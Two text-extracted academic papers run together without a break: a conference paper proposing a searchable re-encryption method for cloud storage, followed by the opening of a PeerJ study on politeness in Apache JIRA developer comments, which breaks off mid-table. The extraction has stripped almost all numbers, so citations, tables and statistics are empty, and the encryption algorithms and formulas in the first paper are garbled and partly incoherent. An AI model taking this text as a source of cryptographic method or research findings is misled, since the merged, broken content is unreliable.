cloud storage system,a searchable re-encryption storage method (srecsm) is proposed in this paper. the central idea of the srecsm is to generate a re-encryption key and decrypte while the keyword matched. simulation results show that srecsm introduced in this paper has better security and reliability. keywords-cloud storage; re-encryption; decrypt; reliability i. introduction in order to meet the various storage demands, cloud storage is designed to store data in cloud and is widely used in the internet. compared with traditional data storage, it greatly improves the efficiency of the mass data storage and utilization of network resource. it is essential to reduce user download wait time for a requested file from a network to enhance client quality experience. therefore, cloud storage faces serious security and efficient problems [ ]. traditional cloud storage systems do not adapt well to different application environment and does not guarantee the integrity and confidentiality of cloud data. therefore, it's very dangerous for sensitive data to be stored directly in the cloud. the reliability of the mobile cloud storage depends on the extent of the impact on system storage efficiency while the storage solution fails [ ]. therefore, storing sensitive data on un-trusted server is a challenging issue [ ]. simple encryption techniques have key management issues and which can't support complex requirements such as query, parallel modification, and fine-grained authorization. to guarantee confidentiality and proper access control of sensitive data, classical encryption is used [ ].to solve the problems brought by the hysteretic and density of traditional storage methods in the cloud storage system, in this paper, srecsm, searchable re-encryption storage method is proposed. ii. related work efforts have been taken by researchers, developers, practitioners, and educators to identify and discuss the technical challenges and recent advances related to cloud storage. han et al. proposed [ ] multi-path data prefetching in mobile cloud storage. wang et al. [ ] presented an optimized replica distribution method (ordm) in cloud storage system. chen et al. [ ] proposed a new metric called joint response time, which not only considers the waiting time when the requested data are unavailable but also the queuing delay and service time when data become available. tysowski et al. proposed several useful schemes in [ ]. one scheme is a manager based re-encryption scheme (mres), which acomplished the security through the proxy re-encryption scheme. and the other cryptographic scheme proposed in [ ] is cloud-based re-encryption scheme (cres). although mres and cres make up for the limitations of the existing schemes, these two schemes are more complex and need more time to re-encrypt. [ ] propose proxy re-encryption algorithm to confirm the security of the datain thecloud, which can alleviate the client's burden, and enhance the confidentiality of cloud data. however, there are two major disadvantages with these techniques. first, for re- encryotion, the data owner must obtain user's public key before uploading. second, because the same plaintext is used with different keys gerenated by proxy, therefore, the storage overhead becomes excessive. iii. searchable re-encryption method the central idea of the searchable re-encryption is to generate a re-encryption key and decrypte while the keyword matched. by using searchable re-encryption method, srecsm may increase the storage requirements because all the encrypted data must be stored. the objective of the proposed searchable re-encryption method is to improve the storage requirements, bring down the security risks, minimize the scheduling time, overhead ratio and the storage cost. this technique will not provide the effective data utilization. the new method srecsm is easier and faster to implement in the cloud while sorting the matrix by using the searcherable keyword. srecsm would reduce the cost and the time complexity will be reduced. a. symbol definitions symbols in the searchable re-encryption method are defined in the in table i. mailto:a.author@email.com http://cn.bing.com/dict/search?q=cloud&form=bdvsp &mkt=zh-cn http://cn.bing.com/dict/search?q=storage&form=bdvsp &mkt=zh-cn international conference on sensor network and computer engineering (icsnce ) table i. symbol definition symbol definition pr(key) private key of the user pu(key) public key of the user key(wd) keyword db database ed(key) editing keyword en(dat) encrypted data pr(key)re re-encrypted private key pu(key)re re-encrypted public key ed(dat) re re-encrypted encrypted data de(dat) decrypted data key(u) keyword got through the public key key(r) keyword got through the private key sen sender rec receiver ser cloud server b. keyword editing the keyword can be edited in three cases while searching. we can edit the keyword while inserting, deleting or substituting. let us suppose that n is this notation and the keyword edited is  ed key . case if  ~= ( )ed key n i inserting the character into the first place for example: character string (old) = ‘‘bok’’ if = i ;  ~= ( )ed key n in third place have to insert new character character string (new) = ‘‘book’’ case if   ( )ed key n i deleting the character into the first place for example: character string (old) = ‘‘bok’’ if = i ;   ( )ed key n in third place have to delete the letter character string (new) = ‘‘bo’’ case if   ( )ed key n i substitute the character into the first place for example: character string (old) = ‘‘bok’’ if = i ;   ( )ed key n the third position in the keyword is replaced with a new character character string (new) = ‘‘bok’’ these three different cases can help us edit the keywords easily. the user handles some of the wrong situations by using the keyword. and we can edit the keyword to recover errors through these three different situations. c. searchable re-encryotion the core of the searchable re-encryption method is to generate a re-encryption key only when the keyword matches to the character. re-encryption operates over two groups g and g of prime order q with a bilinear map e : g g g  . the parameters of the cloud system are random generators g g and   ,z e g g g  . the searchable re-encryption can be defined in the following algorithms. next, the algorithm is described in detail. in algorithm , the keywords should be searched first. the file would be decrypted with this keyword only when the keyword matches. and then the data can be received, stored, and accessed in the cloud. algorithm : searching keyword input: keyword for ( )pr key output: keyword matching if ( ) ( )pr key key wd goto  db i else if ( ) ( )ed key n i \\ case- goto  db i keyword not matching else if ( ) ( )ed key n i \\ case- keyword matching" end if the keywords are included in the private key and will be searched in the database. keyword contained in the private key should be validated in the cloud storage database. in the cloud system, the data will be transmited to the servers and then be stored in the database. data can be accessed from the database through this keyword. the mode of "keyword editing " can be used to insert, delete, and replace when the keyword does not match. on the contrary, the data will be received from the cloud server once the keyword matches. algorithm : sharing data generate ( )pu key and ( )pr key   ( )= ( ),pu key en dat key u   ( )=pr key key r sen shares ( )pu key to ser sen shares ( )pr key to rec send ( )en dat to ser rec sends  key r to ser ser verify  key r if  key u =  key r ser sends   ( ),de dat key r to rec end if the data may be shared between the owners and the users through the cloud server, which is introduced in detail in algorithm . first, the public key and the private key will be created by the data owners. next, the public key is shared to the cloud server and the private key is shared to the data receiver. there is the keyword in each private key and public key, and the data users can retrieve data through this international conference on sensor network and computer engineering (icsnce ) keyword. finally, the data will be transfered by the cloud server only when the keyword of the public key and the keyword of the private key is matched. algorithm : encrypting data define two prime numbers as s and t assign r s t  , where r will be used for the module of the private key and the public key assign euler’s function as    ( ) e r s t   assign i as integer and   i e r  for all   , i e r  in which, i and  e r are co-prime assign   , , , nd f f f  ; f as file, d as data and n as the number of the files.          , , , nd r f r f r f r  encrypted data,     ( ) ( ); ( ),en dat d r mod e r key wd pu key algorithm introdeces the scheme of data encryption, in which the data will be encrypted through the rsa algorithm. first, the two prime numbers are multiplied together, and then compute the product. each data may be encrypted with euler’s function of  e r . keyword of the public key and private key are contained in encrypted data. and each data is modeled by using function of  e r . algorithm : re-encrypting data generate   re pr key ,   re pu key assign   , , , nd f f f  , g g ; f as files, d as the data and n as the number of the files.          , , , nd r f r f r f r  re-encrypted data, re ( ) ( ( ), ( )) m m re ed c pu pu key ed c algorithm introdeces the scheme of data re-encryption, in which the data will be encrypted through the aes algorithm. the re-encryption keys for authorized user's list will be generated by the user 'm'. the public key and private key of the users' can be used by 'v'. re re ( ) ( ) ( ) ,i m x x i pu key pr key g v v    the csresm generates the * i q v z and encrypts the data through the following steps randomly: ( ) i i v v new z z pu key  ( ( ) ) ( )i i v v new en dat z z m   ( ) , ( )i i m v v x en c z m en cm g   the encrypted data ' ( )en c ' will be uploaded through csresm and ' ( ) m en c ' represents the mobile user 'm'. the csresm transforms ' ( ) m en c ' into ' ( ) m re en c ' using the re-encryption key re ( )pu key and ( ) m en c as shown in the following equation: re ( ) ( ( ), ( )) m m en c e pu key en c = , ( ) i m m i x x x v e g g = ( ) i i x v e g g, algorithm : decrypting data consider d key =  ( ), ( )pr key key wd for f  to n //data files   ( ) ( )de dat en dat mod pr key end for f loop goto ( )de dat algorithm introdeces the scheme of data decryption, in which the data will be decrypted through the steps described above. first, the decryption key will be used by the user, and the decryption key contains the keyword of the private key. after selecting the number of files, the data will be decrypted through modulo function. d. security analysis assuming that the reliability of the cloud storage system is identified by symbol a . the time of encryption through different encryption algorithms is t a , the encryption time t a is reversed first , and after the normalization processing , j a is got from t a .the storage cost of the different node is normalized to be thevalue k a . the number of the storage states for the cloud storage is the value n the reliability model of the system is shown in formula ( ). [ ( ) ][ ( ) ] n n j k a a a      it can be concluded from the analysis of the reliability model. when the vale t tends to be infinite, which means t  , the storage cost of the node in the cloud system also tends to a certain stable value, and the state of storage strategy tends to be stable. when the value of j a and k a are more closer to , and the value of n is more large, the cloud storage system will be more reliable and with higher security. iv. experiment the proposed scheme srecsm searchable re- encryption storage method was developed and verified through python. the real-time ability, security and reliability of srecsm was evaluated through a series experiments. in this part, we analyzed the prediction, the searching time, searching efficiency and storage space while performing moving, copying, encryption, re-encryption, storing and decryption. the final experimental results are comparative analyzed with the existing technologies including cres and international conference on sensor network and computer engineering (icsnce ) mres, and the results show that srecsm has better security and reliability. a. uploading and downloading of srecsm the data response tests are performed on file upload, file copy and file movement, for large files and small files respectively.it can be known that percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. the experimental results show that the system responds fast. table Ⅱ and table iii are the test result. table ii. the performance of the mobile end upload the data type of test utilization rate of mobile cpu (%) transmissio n rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . the ratio of cpu occupancy to upload speed is shown in table Ⅱ, which the data on the mobile side are tested before the encryption and after the encryption respectively. table iii. the performance of the mobile end download the data type of test utilization rate of mobile cpu (%) transmissi on rate (mbps) utilization rate of mobile /transmission rate raw data . . . after the encryption . . . the ratio of cpu occupancy to download speed is shown in table iii, which the data on the mobile side are tested before the decryption and after the decryption respectively. it can be known from the table Ⅱ and the table iii, if the encryption and decryption mechanism are used for transmission, then the cpu utilization will be increased by an average of % ~ % and the overall file transfer rate will be reduced by % ~ %. as we can see,when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. b. encryption and re-encryption srecsm the keyword can be set and searched in proposed method srecsm. only if the value of the keyword just matches, data can be received. suppose that the number of the users in proposed method srecsm is users, and the available number of the searching keywords range from to . the cloud server store the keywords and all encrypted data through the database. there are two questions to be considered: one is the impact of encryption and decryption on file speed.the other is the impact of encryption and decryption on the performance of the client host. the experimental data are listed in table iv, which includes the time spent on encrypting the different sizes or different type files by using srecsm and the time spent on transmitting the file. table iv. time comparison on encryption and decryption by using srecsm file size (m) file type srecsm encryption (ms) hds upload (ms) srecsmdecr yption (ms) hds download (ms) . pdf . mp . mkv . doc . rmvb it can be concluded from the above test data, the time spent on encryption or decryption by using srecsm is regardless of the file type. the same size files are encrypted by different cres, mres, or srecsm algorithms and then the re-encryption time is different, as shown in table v and figure . the . mb file in table v is the test case. figure . comparison of re-encryption time in the srecsm proposed in this paper,the time of encryption or decryption is relatively short. it may take a relatively long time to encrypt files by using the cres, which cause a significant additional time overhead for hdfs. however, the encryption time that mres encrypting the file was not significantly increased compared to srecsm. besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. table v. time comparison for different algorithm encryption file size (m) mres re-encrypt (ms) cresre- encrypt (ms) srecsmre -encrypt (ms) . . . . the comparison of the storage space required in different schemes is shown in figure a. as the number of keywords increase, the storage space required by the cloud system also becomes larger. more storage space have been required by the existing schemes such as cres and mres. however, we international conference on sensor network and computer engineering (icsnce ) can see in figure a that srecsm utilize the data transfer effectively and moreover reduce the storage space requirements in the system. figure . comparison while increasing the number of keywords it can be observed from the trends presented in figure b that the searching time varies according to the number of keywords. the available number of the searching keywords range from to . as the number of keywords increases, searching time required by the system also increase. more searching time have been need by cres and mres. and we can see in figure b that lesser time was need to search using srecsm. if the searching keyword does not match, srecsm will immediately use the edit function. mres, cres, and srecsm offload the re-encryption operations in cloud system. and then in the following experiment, we examined the energy consumption and turnaround time while the re-encryption operation were performed. the experimental results are shown in fig. . figure . comparison while re-encryption and decryption we can see from figure a and b, while re-encryption operations were performed in mobile terminal, the turnaround time and energy consumption will increase according to the file size increases.in the same way, figure c and d show that, while decryption operations were performed in mobile terminal, the turnaround time and energy consumption will increase according to the file size increases. using the reliability model formula ( ) of the cloud storage system proposed in . , combine the time required for processing the same size of file in table iii, when a different algorithm cres,mres and srecsm is used, the encryption time required for encrypting file, after that the encryption time is reversed, j a then be got after the encryption time is normalized.in the same way, after normalizing, storage cost k a is got. if both j a and k a are closer to , and the number of storage state in the cloud storage system is larger, then the reliability of the system is higher. according to the above analysis,the data in one hour is sampled continuously, combined with the data in table iii and table iv, the reliability contrast diagram for srecsm is shown in figure . figure . the reliability contrast diagram it can be know the reliability of the system through different algorithm by comparing the data in figure .the reliability of the system is relatively high. that is, it has little impact on file transfer and user experience by using cres re-encryption. it may take a relatively long time to re- encrypt files by using the mres.however, the re-encryption time that mres combined with cres for re-encrypting the file was not significantly increased compared withcres. the value of the reliability is consistent with the use of cres, which can be maintained around one. it is concluded that the system is relatively reliable by using srecsm encryption. through these simulation experiments, it is verified that srecsm has a good user experience. it is also verified that the mechanism of srecsm can effectively improve the efficiency of the cloud storage.when a mobile terminal makes a request, the optimal node is selected and then the time can be saved effectively. in the srecsm presented in this paper, the re-encryption and decryption has the following characteristics:transport security and storage security of the user data are guaranteed. v. conclusions and future work the existing schemes such ascloud-based re-encryption scheme cres and manager-based re-encryption scheme mres re-encrypts the keyword to transmit safety. but these two schemes are more complex and need more time to re- international conference on sensor network and computer engineering (icsnce ) encrypt. in order to reduce the computational complexity, enhance the secure transmission,a new scheme srecsm is proposed.srecsm has high reliability proved through a series of simulation experiments. turn around time and energy consumption of different size of files are compared and analyzed through these experiments. when the file size increases, proposed srecsm can achieve accurate predictions, reduce the storage space requirement and the re- encrypting time. finally, it is concluded that the srecsm proposed in this paper has better security and reliability. acknowledgment foundation item: the industrial research project of science and technology department of shaanxi province(grant no. ktzdgy - ); laboratory fund of xi'an technological university (gsysj ); research project on teaching reform of education in shaanxi province (grant no. jy ); characteristic disciplines in education department of shaanxi province (grant no. ); research project on teaching reform of xi 'an technological university (grant no. jgz ); the principal fund of xi'an technological university (grant no. xgyxjj- ). references [ ] jung, kye-dong, moon, seok-jae, kim, jin-mook: 'data access control method for multimedia content data sharing and security based onxmdr-dai in mobile cloud storage'.multimedia tools and applications, v , n , october , , pp - [ ] chekam, t.t., zhai, e., li, z., cui, y., ren, k.: 'on the synchronization bottleneck of openstack swift-like cloud storage systems'. in: ieee infocom - the th annual ieee international conference on computer communications, , pp. – [ ] li, l., li, d., su, z., jin, l., huang, g.: 'performance analysis and framework optimization of open source cloud storage system'. china commun. ( ), , pp. – [ ] iliadis, i., sotnikov, d., ta-shma, p., venkatesan, v.: 'reliability of geo-replicated cloud storage systems'. in: ieee th pacific rim international symposium on dependable computing, , pp. – [ ] han, lin; huang, hao; xie, chang-sheng: 'multi-path data prefetching in mobile cloud storage'. in: proceedings - international conference on cloud computing and big data, ccbd , march , , pp. - [ ] wang, yan; wang, jinkuan: 'an optimized replica distribution method in cloud storage'. journal of control science and engineering, v [ ] chen, ming-hung; tung, yu-chih; hung, shih-hao; lin, kate ching-ju; chou, cheng-fu: availability is not enough: minimizing joint response time in peer-assisted cloudstorage systems. ieee systems journal, v , n , december , pp. - [ ] tysowski, p.k., hasan, m.a.: 're-encryption-based keymanagement towards secure and scalable mobile applica-tions in clouds'. iacr cryptology e print archive , [ ] purushothama, b.r; shrinath, b.; amberker, b.b. : 'secure cloud storage service and limited proxy re-encryption for enforcing accesscontrol in public cloud'. international journal of information and communication technology, v , n , , pp. - submitted november accepted june published july corresponding author giuseppe destefanis, giuseppe.destefanis@brunel.ac.uk academic editor arie van deursen additional information and declarations can be found on page doi . /peerj-cs. copyright destefanis et al. distributed under creative commons cc-by . open access software development: do good manners matter? giuseppe destefanis , marco ortu , steve counsell , stephen swift , michele marchesi and roberto tonelli department of computer science, brunel university, london, united kingdom department of electrical and electronic engineering, university of cagliari, cagliari, italy abstract a successful software project is the result of a complex process involving, above all, people. developers are the key factors for the success of a software development process, not merely as executors of tasks, but as protagonists and core of the whole development process. this paper investigates social aspects among developers working on software projects developed with the support of agile tools. we studied open- source software projects developed using the agile board of the jira repository. all comments committed by developers involved in the projects were analyzed and we explored whether the politeness of comments affected the number of developers involved and the time required to fix any given issue. our results showed that the level of politeness in the communication process among developers does have an effect on the time required to fix issues and, in the majority of the analysed projects, it had a positive correlation with attractiveness of the project to both active and potential developers. the more polite developers were, the less time it took to fix an issue. subjects data mining and machine learning, data science, software engineering keywords social and human aspects, politeness, mining software repositories, issue fixing time, software development introduction high-level software development is a complex activity involving a range of people and activities; ignoring human aspects in the software development process or managing them in an inappropriate way can, potentially, have a huge impact on the software production process and team effectiveness. increasingly, researchers have tried to quantify and measure how social aspects affect software development. bill curtis claimed that ‘‘the creation of a large software system must be analyzed as a behavioural process’’ (curtis, krasner & iscoe, ). coordinating and structuring a development team is thus a vital activity for software companies and team dynamics have a direct influence on group successfulness. open-source development usually involves developers that voluntarily participate in a project by contributing with code-development. in many senses, the management of such developers is more complex than the management of a team within a company: developers are not in the same place at the same time and coordination therefore becomes more difficult. additionally, the absence of face-to-face communication mandates the use of alternative technologies such as mailing lists, electronic boards or issue tracking systems. in this context, being rude or aggressive when writing a comment or replying to a contributor can affect the cohesion of the group, its membership and the successfulness of a project. how to cite this article destefanis et al. ( ), software development: do good manners matter? peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:giuseppe.destefanis@brunel.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. on the other hand, a respectful environment provides an incentive for new contributors to join the project and could significantly extend the lifetime and usefulness of a project to the community. according to versionone (https://www.versionone.com/pdf/ -state-of-agile- survey.pdf) (versionone, ): ‘‘more people are recognising that agile development is beneficial to business, with an % increase over the last two years in the number of people who claim that agile helps organisations complete projects faster’’. a main priority reported by users was to accelerate time to market, manage changing priorities more easily and better align it and business objectives. agile project management tools and kanban boards experienced the largest growth in popularity of all agile tool categories, with use or planned use increasing by %. one of the top five ranked tools was atlassian jira (https://www.atlassian.com/software/jira), with an % recommendation rate. agile boards represent the central aspect of communication in the agile philosophy. according to perry ( ) ‘‘the task board is one of the most important radiators used by an agile team to track their progress.’’ the jira board is a good solution for bridging the gap between open-source software development and the agile world. it is the view of many that agile development requires a physical aspect, i.e., developers working together in the same room or building, or at the same desk; the pair programming paradigm, for example, requires at least two people working simultaneously on the same piece of code. by using tools such as the jira board (fig. ) it is possible to use an agile board for development of a project by developers in different physical places. working remotely, in different time zones and with different time schedules, with developers from around the world, requires coordination and communication. the jira board displays issues from one or more projects, giving the possibility of viewing, managing and reporting on work in progress. it is possible to use a board that someone else has created, or create as many boards as needed. when a new developer joins a development team, the better the communication process works, the faster the new developer can become productive and the learning curve reduced. the notion of an agile board therefore places emphasis on the know-how and shared-knowledge of a project being easily accessible for the development team throughout the development process. fast releases, continuous integration and testing activities are directly connected to the knowledge of the system under development. the potential for agile boards to simplify development across geographically disparate areas is in this sense relatively clear. in a similar vein, the social and human aspects of the development process are becoming more and more important. the google work style has become a model for many software start-ups: a pleasant work environment is important and affects the productivity of employees. one important contributor to a healthy work environment is that each employee is considerate and polite towards their fellow employees. collins dictionary (http: //www.collinsdictionary.com/dictionary/english/polite) defines politeness as ‘‘showing regard for others, in manners, speech, behaviour, etc.’’ we focus on the politeness of the comment-messages written by the developers. the research aims to show how project management tools such as agile boards can directly affect the productivity of a software development team and the health of a software project. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.versionone.com/pdf/ -state-of-agile-survey.pdf https://www.versionone.com/pdf/ -state-of-agile-survey.pdf https://www.atlassian.com/software/jira http://www.collinsdictionary.com/dictionary/english/polite http://www.collinsdictionary.com/dictionary/english/polite http://dx.doi.org/ . /peerj-cs. figure example of jira board with issues. the state of the art tool developed by danescu-niculescu-mizil et al. ( ) was used to evaluate politeness within comment-messages. the authors proposed a machine learning approach for evaluating the politeness of a request posted in two different web applications: wikipedia (https://en.wikipedia.org/wiki/main_page) and stack overflow (http://stackoverflow.com). stack overflow is well known in the software engineering field and is largely used by software practitioners; hence, the model that authors used in danescu-niculescu-mizil et al. ( ) was suitable for our domain based on jira issues, where developers post and discuss about technical aspects of issues. the authors provide a web application (http://www.mpi-sws.org/~cristian/politeness.html) and a library version of their tool. to prepare the training set for the machine learning approach, over , utterances were labeled using amazon mechanical turk. the authors decided to restrict the residence of the annotators to the us and conducted a linguistic background questionnaire. since ‘‘politeness is a culturally defined phenomenon and what is considered polite in one culture can sometimes be quite rude or simply eccentric in another cultural context’’ (http://en.wikipedia.org/wiki/politeness), the choice of limiting the residence of the annotators to the us could be interpreted as a weakness of the the tool. however, the annotators analysed comments written by authors from around the world and not only destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://en.wikipedia.org/wiki/main_page http://stackoverflow.com http://www.mpi-sws.org/~cristian/politeness.html http://en.wikipedia.org/wiki/politeness http://dx.doi.org/ . /peerj-cs. from the us. therefore, the possible bias introduced by annotators with a similar cultural background, is reduced and the different cultures of the developers involved in the analysis considered. the use of the tool would have been problematic, if annotators were from the us and they had analysed only comments written by authors from the us. we considered open source projects from one of the largest datasets of issues reports openly available (ortu et al., d). this paper aims to answer the following research questions: • does a relationship exist between politeness and issues fixing time? issue fixing time for polite issues is shorter than issue fixing time for impolite and mixed issues. • does politeness among developers affect the attractiveness of a project? magnetism and stickiness are positively correlated with the percentage of polite comments. • does the percentage of polite comments vary over time? the percentage of polite comments does vary over time and in some cases it changes from lower percentage of polite comments to higher percentage of polite comments from two consecutive observation intervals. the percentage of polite comments over time is (for the majority of the projects in our corpus) seasonal and not random. • how does politeness vary with respect to jira maintenance types and issue priorities? comments related to issues with maintenance bug, priority minor and trivial, tend to have a higher percentage of impolite comments. issues with maintenance new feature, priority blocker and critical tend to have a higher percentage of polite comments. this paper is an extended version of earlier work by the same authors (ortu et al., b). we added eight new systems to the original corpus analysed in (ortu et al., b) and two new research question (rq and rq ), we also reviewed the rq performing deeper statistical analysis. the remainder of this paper is structured as follows: in the next section, we provide related work. ‘experimental setup’ describes the dataset used for this study and our approach/rationale to evaluate the politeness of comments posted by developers. in ‘results,’ we present the results and elaborate on the research questions we address. in ‘discussion’ we present a discussion on the obtained results and ‘threats to validity’ discusses the threats to validity. finally, we summarise the study findings and present plans for future work in ‘conclusions and future work.’ related work a growing body of literature has investigated the importance and the influence of human and social aspects, emotions and mood both in software engineering and software development. research has focused on understanding how the human aspects of a technical discipline can affect final results (brief & weiss, ; capretz, ; cockburn & highsmith, ; erez & isen, ; kaluzniacky, ), and the effect of politeness (novielli, calefato & lanubile, ; tan & howard-jones, ; winschiers & paterson, ; tsay, dabbish & herbsleb, ; rousinopoulos, robles & gonzález-barahona, ). destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. feldt et al. ( ) focused on personality as a relevant psychometric factor and presented results from an empirical study about correlations between personality and attitudes to software engineering processes and tools. the authors found that higher levels of the personality dimension ‘‘conscientiousness’’ correlated with attitudes towards work style, openness to changes and task preference. it companies are also becaming more conscious of social aspects. ehlers ( ) evaluated the efforts of it companies in acquiring software engineers by emphasizing socialness in their job advertising. the research analyzed , jobs advertising from the recruiting platform indeed and about , job ads from stackoverflowcareers to investigate correlations between social factors and the employee satisfaction of a work place. the findings showed that many companies advertise socialness explicitly. the manifesto for agile development indicates that people and communications are more essential than procedures and tools (beck et al., ). studies have also investigated the relationship between affect and work-related achievements, including performance (miner & glomb, ) and problem-solving processes, such as creativity, (amabile et al., ). furthermore, strong evidence for emotional contagion on all its possible polarities has been found in a recent very large scale study (kramer, guillory & hancock, ). therefore, affect is an interesting avenue for research in software engineering. steinmacher et al. ( ) analyzed social barriers that obstructed first contributions of newcomers (new developers joining an open-source project). the study indicated how impolite answers were considered as a barrier by newcomers. these barriers were identified through a systematic literature review, responses collected from open source project contributors and students contributing to open source projects. roberts, hann & slaughter ( ) conducted a study which revealed how the different motivations of open-source developers were interrelated, how these motivations influenced participation and how past performance influenced subsequent motivations. guzman & bruegge ( ) and guzman ( a) have proposed prototypes and initial descriptive studies towards the visualization of affect over a software development process. in their work, the authors applied sentiment analysis to data coming from mailing lists, web pages, and other text-based documents of software projects. guzman et al. built a prototype to display a visualization of the affect of a development team, and they interviewed project members to validate the usefulness of their approach. in another study, guzman, azócar & li ( ), performed sentiment analysis of github’s commit comments to investigate how emotions were related to a project’s programming language, the commits’ day of the week and time, and the approval of the projects. the analysis was performed over top-starred github repositories implemented in different programming languages. the results showed java to be the programming language most associated with negative affect. no correlation was found between the number of github stars and the affect of the commit messages. panichella et al. ( ) presented a taxonomy to classify app reviews into categories relevant to software maintenance and evolution, as well as an approach that merges three techniques (natural language processing, text analysis, sentiment analysis) to destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. automatically classify app reviews into the proposed categories. the authors showed that the combined use of these techniques achieves better results (a precision of % and a recall of %) than results obtained using each technique individually (precision of % and a recall of %). pletea, vasilescu & serebrenik ( ) studied security-related discussions on github, as mined from discussions around commits and pull requests. the authors found that security-related discussions account for approximately % of all discussions on github and that more negative emotions were expressed in security-related discussions than in other discussions. these findings confirmed the importance of properly training developers to address security concerns in their applications as well as the need to test applications thoroughly for security vulnerabilities in order to reduce frustration and improve overall project atmosphere. garcia, zanetti & schweitzer ( ) analyzed the relation between the emotions and the activity of contributors in the open source software project gentoo. the case study built on extensive data sets from the project’s bug tracking platform bugzilla, to quantify the activity of contributors, and its mail archives, to quantify the emotions of contributors by means of sentiment analysis. the gentoo project is known for a period of centralization within its bug triaging community. this was followed by considerable changes in community organization and performance after the sudden retirement of the central contributor. the authors analyzed how this event correlated with the negative emotions, both in bilateral email discussions with the central contributor, and at the level of the whole community of contributors. the authors also extended the study to consider the activity patterns of gentoo contributors in general. they found that contributors were more likely to become inactive when they expressed strong positive or negative emotions in the bug tracker, or when they deviated from the expected value of emotions in the mailing list. the authors used these insights to develop a bayesian classifier which detected the risk of contributors leaving the project. graziotin, wang & abrahamsson ( ) conducted a qualitative interpretive study based on face-to-face open-ended interviews, in-field observations and e-mail exchanges. this enabled the authors to construct a novel explanatory theory of the impact of affects on development performance. the theory was explicated using an established taxonomy framework. the proposed theory built upon the concepts of events, affects, attractors, focus, goals, and performance. in other work graziotin, wang & abrahamsson ( ) reported the results of an investigation with participants about the relationship between the affective states, creativity, and analytical problem-solving skills of software developers. the results offered support for the claim that happy developers were better problem solvers in terms of their analytical abilities. the authors provided a better understanding of the impact of affective states on the creativity and analytical problem-solving capacities of developers, introduced and validated psychological measurements, theories, and concepts of affective states, creativity, and analytical-problem-solving skills in empirical software engineering, and raised the need for studying the human factors of software engineering by employing a multi-disciplinary viewpoint. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rigby & hassan ( ) analyzed, using a psychometrically-based linguistic analysis tool, the five big personality traits of software developers in the apache httpd server mailing list. the authors found that two developers responsible for the major apache releases had similar personalities and their personalities were different from other developers. bazelli, hindle & stroulia ( ) analyzed questions and answers on stackoverflow.com to determine the developer personality traits, using the linguistic inquiry and word count (pennebaker, francis & booth, ). the authors found that the top reputed authors were more extroverted and expressed less negative emotions than authors of down voted posts. tourani, jiang & adams ( ) evaluated the use of automatic sentiment analysis to identify distress or happiness in a team of developers. they extracted sentiment values from the mailing lists of two mature projects of the apache software foundation, considering developers and users. the authors found that an automatic sentiment analysis tool obtained low precision on email messages (due to long size of the analyzed text) and that users and developers express positive and negative sentiment on mailing lists. murgia et al. ( b) analyzed whether issue reports carried any emotional information about software development. the authors found that issue reports contain emotions regarding design choices, maintenance activity or colleagues. gómez et al. ( ) performed an experiment to evaluate whether the level of extraversion in a team influenced the final quality of the software products obtained and the satisfaction perceived while this work was being carried out. results indicated that when forming work teams, project managers should carry out a personality test in order to balance the amount of extraverted team members with those who are not extraverted. this would permit the team members to feel satisfied with the work carried out by the team without reducing the quality of the software products developed. acuña, gómez & juristo ( ), performed empirical research examining the work climate within software development teams. the authors attempted to understand if team climate (defined as the shared perceptions of team work procedures and practices) bore any relation to software product quality. they found that high team vision preferences and high participative safety perceptions of the team were significantly related to better software. in a study conducted by fagerholm et al. ( ), it was shown that software teams engaged in a constant cycle of interpreting their performance. thus, enhancing performance experiences requires integration of communication, team spirit and team identity into the development process. jongeling, datta & serebrenik ( ) studied whether the sentiment analysis tools agreed with the sentiment recognized by human evaluators as well as with each other. furthermore, the authors evaluated the impact of the choice of a sentiment analysis tool on software engineering studies by conducting a simple study of differences in issue resolution times for positive, negative and neutral texts. the authors repeated the study for seven datasets and different sentiment analysis tools and observed that the disagreement between the tools can lead to contradictory conclusions. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected projects statistics. project # of comments # of developers hbase , hadoop common , , derby , lucene core , , hadoop hdfs , cassandra , , solr , , hive , hadoop map/reduce , harmony , ofbiz , infrastructure , , camel , zookeeper , geoserver , geronimo , groovy , , hibernate orm , , jboss , jruby , , pig , wicket , , tot , , experimental setup dataset we built our dataset collecting data from the apache software foundation issue tracking system, jira (https://www.atlassian.com/software/jira). an issue tracking system (its) is a repository used by software developers to support the software development process. it supports corrective maintenance activity like bug tracking systems, along with other types of maintenance requests. we mined the its of the apache software foundation collecting issues from october to december . in order to create our dataset, since the focus of our study was about the usefulness of agile boards, we selected projects for which the jira agile board contained a significant amount of activity. namely, we selected those systems for which the agile board contained more than , comments (in order to build a time series with sufficient data) and there was a recorded monthly activity (i.e., developers were active for every considered month). the jira dataset contains roughly , projects, of which characterised by more than , comments. table shows the corpus of projects selected for our analysis, highlighting the number of comments recorded for each project and the number of developers involved. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.atlassian.com/software/jira http://dx.doi.org/ . /peerj-cs. user’s names are reported as <dev_name_a> for the sake of privacy. table examples of polite and impolite comments. comment polite hey <dev_name_a>, would you be interested in contributing a fix and a test case for this as well? thanks, <dev_name_b> yes <dev_name>, can you open a new jira for those suggestions? i’ll be happy to review. yes <dev_name>, the latest patch isn’t applying cleanly to trunk - could you resubmit it please? thanks. yes <dev_name>, since you can reproduce, do you still want the logs? i think i still have them if needed. yes why are you cloning tickets? don’t do that. no shouldnt it check for existence of tarball even before it tries to allocate and error out ??? no <dev_name_a>, why no unit test? <dev_name_b>, why didn’t you wait for + from hudson??? no > this isn’t the forum to 